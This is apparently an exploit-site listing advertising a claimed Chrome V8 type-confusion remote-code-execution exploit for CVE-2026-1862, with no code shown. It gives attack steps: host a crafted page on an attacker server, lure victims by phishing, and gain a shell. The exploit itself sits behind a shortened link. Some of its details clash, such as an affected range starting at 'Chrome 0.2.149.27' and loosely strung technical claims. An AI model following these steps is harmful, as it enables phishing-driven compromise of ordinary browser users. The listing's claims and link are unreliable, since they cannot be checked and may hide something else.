Share
## https://sploitus.com/exploit?id=3041A0B4-33BA-5379-85AA-7364BBDC41B5
# CVE-2026-1862

## Disclaimer
This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.

RCE exploit targeting V8 type confusion in Google Chrome <= 144.0.7559.110. Remote trigger via crafted HTML/JS payload, no auth needed, user interaction (page load). Achieves arbitrary read/write via heap groom + OOB access. Tested on Win10/11 x64. Bypasses ASLR/CFG via info leak in Maglev compiler phase.

## Scope
- **Affected**: Chrome 0.2.149.27 - 144.0.7559.110 (full list in `affected_versions.json`).
- **Impact**: Heap corruption โ†’ EoP, potential sandbox escape with ROP chain.
- **Mitigation**: Upgrade to 144.0.7559.132+.

## Usage
1. Host `poc.html` on attacker-controlled server.
2. Lure victim to load via phishing/social eng.
3. Payload triggers type confusion in V8's `JSObject::GetProperty` during optimized codegen; confuses `Smi` with `HeapObject` ptr, enables fakeobj + arb RW.
4. Shell pops via `win32u!NtUserMessageCall` gadget for dep bypass.

Exploit - [here](https://tinyurl.com/4fm4ta3h)

Inquiries via [PGP](https://github.com/b1gchoi/public/blob/main/README.md)